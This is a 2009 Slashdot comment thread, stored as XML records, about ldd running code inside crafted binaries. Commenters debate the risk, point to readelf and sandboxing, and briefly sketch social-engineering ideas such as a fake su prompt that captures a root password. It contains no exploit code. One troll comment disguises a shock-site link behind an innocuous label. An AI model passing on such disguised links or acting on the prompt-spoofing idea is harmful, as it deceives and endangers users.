Now it sounds like ldd is being used here possibly for increased privileges, but that's all.
The real challenge is getting someone a compromised executable.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873149</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873891</id>
	<title>#ir3.tro\lltalk.com</title>
	<author>Anonymous</author>
	<datestamp>1256579220000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>-1</modscore>
	<htmltext><A HREF="http://goat.cx/" title="goat.cx" rel="nofollow">Dec3Ntralized</a> [goat.cx]</htmltext>
<tokenext>Dec3Ntralized [ goat.cx ]</tokentext>
<sentencetext>Dec3Ntralized [goat.cx]</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873305</id>
	<title>use readelf</title>
	<author>Anonymous</author>
	<datestamp>1256576160000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>1</modscore>
	<htmltext><p>readelf -d</p></htmltext>
<tokenext>readelf -d</tokentext>
<sentencetext>readelf -d</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882019</id>
	<title>Re:Other dirty tricks</title>
	<author>KiloByte</author>
	<datestamp>1256643900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>But if you can create a crafted binary of your own, you can simply copy the app you want executed and chmod +x it.  It will have the exact same capabilities as the other binary you can create.  Thus, mapping ld.so doesn't give you anything and is not a vulnerability at all.</p></htmltext>
<tokenext>But if you can create a crafted binary of your own , you can simply copy the app you want executed and chmod + x it .
It will have the exact same capabilities as the other binary you can create .
Thus , mapping ld.so does n't give you anything and is not a vulnerability at all .</tokentext>
<sentencetext>But if you can create a crafted binary of your own, you can simply copy the app you want executed and chmod +x it.
It will have the exact same capabilities as the other binary you can create.
Thus, mapping ld.so doesn't give you anything and is not a vulnerability at all.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873859</id>
	<title>Re:1985 called, they want their exploit back</title>
	<author>Tetsujin</author>
	<datestamp>1256579040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p> <a href="http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html" title="archive.org">http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html</a> [archive.org] </p></div><p>1985?  The message you linked was from 2005...</p><p>Either way, though - whether this has been known for four years or twenty-four years, it'd be nice if they'd fix it...</p></div>
	</htmltext>
<tokenext>http : //web.archive.org/web/20050211210119/http : //reverse.lostrealm.com/protect/ldd.html [ archive.org ] 1985 ?
The message you linked was from 2005...Either way , though - whether this has been known for four years or twenty-four years , it 'd be nice if they 'd fix it.. .</tokentext>
<sentencetext> http://web.archive.org/web/20050211210119/http://reverse.lostrealm.com/protect/ldd.html [archive.org] 1985?
The message you linked was from 2005...Either way, though - whether this has been known for four years or twenty-four years, it'd be nice if they'd fix it...
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874921</id>
	<title>Re:the bug is not in ldd</title>
	<author>makomk</author>
	<datestamp>1256583720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>It's not a bug, it's a design flaw. ldd has always worked by executing the target file under certain circumstances; I'm sure this used to be better documented.</p></htmltext>
<tokenext>It 's not a bug , it 's a design flaw .
ldd has always worked by executing the target file under certain circumstances ; I 'm sure this used to be better documented .</tokentext>
<sentencetext>It's not a bug, it's a design flaw.
ldd has always worked by executing the target file under certain circumstances; I'm sure this used to be better documented.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874527</id>
	<title>Deserves a warning in the man-page...</title>
	<author>gweihir</author>
	<datestamp>1256582040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>... but not much else. The potential code-execution is a surprising behavior, that nonetheless is not that critical.</p></htmltext>
<tokenext>... but not much else .
The potential code-execution is a surprising behavior , that nonetheless is not that critical .</tokentext>
<sentencetext>... but not much else.
The potential code-execution is a surprising behavior, that nonetheless is not that critical.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785</id>
	<title>ldd pwned</title>
	<author>Anonymous</author>
	<datestamp>1256573700000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>Sounds like someone needs to make LDD not capable of executing arbitrary code then =]<nobr> <wbr></nobr>/captainobvious</htmltext>
<tokenext>Sounds like someone needs to make LDD not capable of executing arbitrary code then = ] /captainobvious</tokentext>
<sentencetext>Sounds like someone needs to make LDD not capable of executing arbitrary code then =] /captainobvious</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872997</id>
	<title>Nasty</title>
	<author>Anonymous</author>
	<datestamp>1256574840000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>4</modscore>
	<htmltext><p>This is really nasty.</p><p>Even running the binary as nobody may get you into trouble if you are running under X because the rogue code can talk to your X server.</p><p>And of course the rogue code could print out its own prompt and fool you into thinking that you are typing at the shell.  In this case you get owned when you type su and subsequently type your root password into the rogue code.  You'd have to carefully inspect your running processes to not get fooled by this trick.</p><p>Maybe the answer is for ldd to use a sandbox.</p></htmltext>
<tokenext>This is really nasty.Even running the binary as nobody may get you into trouble if you are running under X because the rogue code can talk to your X server.And of course the rogue code could print out its own prompt and fool you into thinking that you are typing at the shell .
In this case you get owned when you type su and subsequently type your root password into the rogue code .
You 'd have to carefully inspect your running processes to not get fooled by this trick.Maybe the answer is for ldd to use a sandbox .</tokentext>
<sentencetext>This is really nasty.Even running the binary as nobody may get you into trouble if you are running under X because the rogue code can talk to your X server.And of course the rogue code could print out its own prompt and fool you into thinking that you are typing at the shell.
In this case you get owned when you type su and subsequently type your root password into the rogue code.
You'd have to carefully inspect your running processes to not get fooled by this trick.Maybe the answer is for ldd to use a sandbox.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983</id>
	<title>And the point is...</title>
	<author>Anonymous</author>
	<datestamp>1256574840000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><p>So, firstly, don't run ldd as root. (I use sudo, so no issues there.)</p><p>Secondly, don't use ldd on untrusted binaries. If you don't trust it why are you trying to run it? I suppose this is useful to see if the attacker is being really obvious and dynamically linking to net-code in a program that shouldn't need net, but other than that I don't see where this is going to be a serious problem, except in the case where you have a direct line to your sysadmin, but if that's the case there are probably a dozen different ways you can trick him into running arbitrary code, not the least of which is "hey, can you install this for me? I need it to get x done." If you're intelligent enough to hack a binary, I think you're intelligent enough that you can come up with a plausible reason your admin should install something you compiled yourself.</p></htmltext>
<tokenext>So , firstly , do n't run ldd as root .
( I use sudo , so no issues there .
) Secondly , do n't use ldd on untrusted binaries .
If you do n't trust it why are you trying to run it ?
I suppose this is useful to see if the attacker is being really obvious and dynamically linking to net-code in a program that should n't need net , but other than that I do n't see where this is going to be a serious problem , except in the case where you have a direct line to your sysadmin , but if that 's the case there are probably a dozen different ways you can trick him into running arbitrary code , not the least of which is " hey , can you install this for me ?
I need it to get x done .
" If you 're intelligent enough to hack a binary , I think you 're intelligent enough that you can come up with a plausible reason your admin should install something you compiled yourself .</tokentext>
<sentencetext>So, firstly, don't run ldd as root.
(I use sudo, so no issues there.
)Secondly, don't use ldd on untrusted binaries.
If you don't trust it why are you trying to run it?
I suppose this is useful to see if the attacker is being really obvious and dynamically linking to net-code in a program that shouldn't need net, but other than that I don't see where this is going to be a serious problem, except in the case where you have a direct line to your sysadmin, but if that's the case there are probably a dozen different ways you can trick him into running arbitrary code, not the least of which is "hey, can you install this for me?
I need it to get x done.
" If you're intelligent enough to hack a binary, I think you're intelligent enough that you can come up with a plausible reason your admin should install something you compiled yourself.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873133</id>
	<title>Security by obscurity</title>
	<author>Anonymous</author>
	<datestamp>1256575500000</datestamp>
	<modclass>Troll</modclass>
	<modscore>1</modscore>
	<htmltext><p>... the Windows way, since 1981.</p></htmltext>
<tokenext>... the Windows way , since 1981 .</tokentext>
<sentencetext>... the Windows way, since 1981.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873269</id>
	<title>I find his background info interesting...</title>
	<author>poofmeisterp</author>
	<datestamp>1256575980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>...and <a href="http://muhammadsaleem.com/2007/09/06/interview-with-peteris-krumins-founder-of-reddit-media-and-digpicz/" title="muhammadsaleem.com">here it is</a> [muhammadsaleem.com].</p></htmltext>
<tokenext>...and here it is [ muhammadsaleem.com ] .</tokentext>
<sentencetext>...and here it is [muhammadsaleem.com].</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874857</id>
	<title>Today, on the news</title>
	<author>Anonymous</author>
	<datestamp>1256583480000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Linux's executable loader allows users to run code that may be malicious. Let's contact with our correspondent, Captain Obvious...</p></htmltext>
<tokenext>Linux 's executable loader allows users to run code that may be malicious .
Let 's contact with our correspondent , Captain Obvious.. .</tokentext>
<sentencetext>Linux's executable loader allows users to run code that may be malicious.
Let's contact with our correspondent, Captain Obvious...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882703</id>
	<title>Arbitrary code?</title>
	<author>Anonymous</author>
	<datestamp>1256652360000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Arbitrary code execution? As opposed to executing the program you're trying to execute in the first place?</p><p>Normal use of ldd is something like:</p><p>$<nobr> <wbr></nobr>./some\_program<br>Some library not found<br>$ ldd<nobr> <wbr></nobr>./some\_program</p><p>ldd is used to figure out why a program doesn't run, and is not going to run any "arbitrary code", that couldn't run when trying to run the program in the first place.</p></htmltext>
<tokenext>Arbitrary code execution ?
As opposed to executing the program you 're trying to execute in the first place ? Normal use of ldd is something like : $ ./some \ _programSome library not found $ ldd ./some \ _programldd is used to figure out why a program does n't run , and is not going to run any " arbitrary code " , that could n't run when trying to run the program in the first place .</tokentext>
<sentencetext>Arbitrary code execution?
As opposed to executing the program you're trying to execute in the first place?Normal use of ldd is something like:$ ./some\_programSome library not found$ ldd ./some\_programldd is used to figure out why a program doesn't run, and is not going to run any "arbitrary code", that couldn't run when trying to run the program in the first place.</sentencetext>
</comment>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_24</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29877115
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874419
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873149
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_22</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875235
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_21</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874519
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_26</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872999
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876675
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872997
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_25</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872929
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882541
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876933
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882577
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_23</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29887067
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876253
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874481
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872913
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874671
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_27</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882019
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873859
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_18</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875209
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873375
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873631
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873815
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873463
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873321
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29889985
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873087
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_19</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876949
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874927
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873133
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872947
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874921
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_20</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875405
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872969
</commentlist>
</thread>
<thread>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#thread_09_10_26_1314209_7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873023
http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
</commentlist>
</thread>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.16</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876817
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.15</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873147
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.13</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875213
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.11</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874527
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.4</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873463
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873815
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.2</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873305
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.14</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872997
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876675
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.12</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872967
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.8</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873483
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873859
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875235
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.9</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873773
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.6</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872983
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874671
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882577
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.10</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873039
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873375
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873631
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873321
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.3</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872895
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872929
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872999
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872955
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876933
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874519
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876949
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873133
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872947
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874927
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873023
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.1</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872963
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882541
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874481
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29876253
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875209
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.0</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872785
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872887
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873149
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874419
----http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29877115
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873087
---http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29889985
--http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874921
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872913
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.7</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29872969
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29875405
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.5</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29874729
</commentlist>
</conversation>
<conversation>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#conversation09_10_26_1314209.17</id>
	<commentlist>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29873289
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29882019
-http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_10_26_1314209.29887067
</commentlist>
</conversation>
